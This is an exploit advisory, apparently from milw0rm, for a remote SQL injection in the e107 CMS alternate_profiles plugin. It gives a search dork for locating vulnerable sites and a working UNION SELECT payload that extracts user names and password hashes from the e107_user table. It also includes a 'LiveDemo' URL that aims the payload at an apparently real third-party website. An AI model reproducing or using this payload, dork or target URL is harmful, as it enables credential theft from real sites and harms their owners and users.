31 lines
No EOL
1.6 KiB
Text
31 lines
No EOL
1.6 KiB
Text
#############################################################
|
|
e107 Plugin alternate_profiles (newuser.php?id) Remote SQL-injetion Vulnerability
|
|
#############################################################
|
|
[~] Author boom3rang
|
|
--------------------------------
|
|
[~] Site www.khg-crew.ws
|
|
--------------------------------
|
|
[~] Greetz KHG & H!tm@N & chs & redc00de & proxy-ki11er & Hurley
|
|
--------------------------------
|
|
[!] Script Name: E107
|
|
[!] Plugin Vuln: alternate_profiles/newuser.php?id=
|
|
[!] Dork: inurl:"/alternate_profiles/
|
|
#############################################################
|
|
|
|
---------------------------------------------------------------------------------------------------
|
|
[-] POC:
|
|
http://localhost/e107_plugins/alternate_profiles/newuser.php?id=[exploit]
|
|
---------------------------------------------------------------------------------------------------
|
|
[-] Exploit:
|
|
-9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/*
|
|
---------------------------------------------------------------------------------------------------
|
|
[-] LiveDemo:
|
|
http://briefcaseit.com/e107_plugins/alternate_profiles/newuser.php?id=-9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/*
|
|
---------------------------------------------------------------------------------------------------
|
|
#########################################
|
|
- United States of Albania
|
|
- Proud to be Albanian
|
|
- Proud to be Muslim
|
|
#########################################
|
|
|
|
# milw0rm.com [2008-10-27] |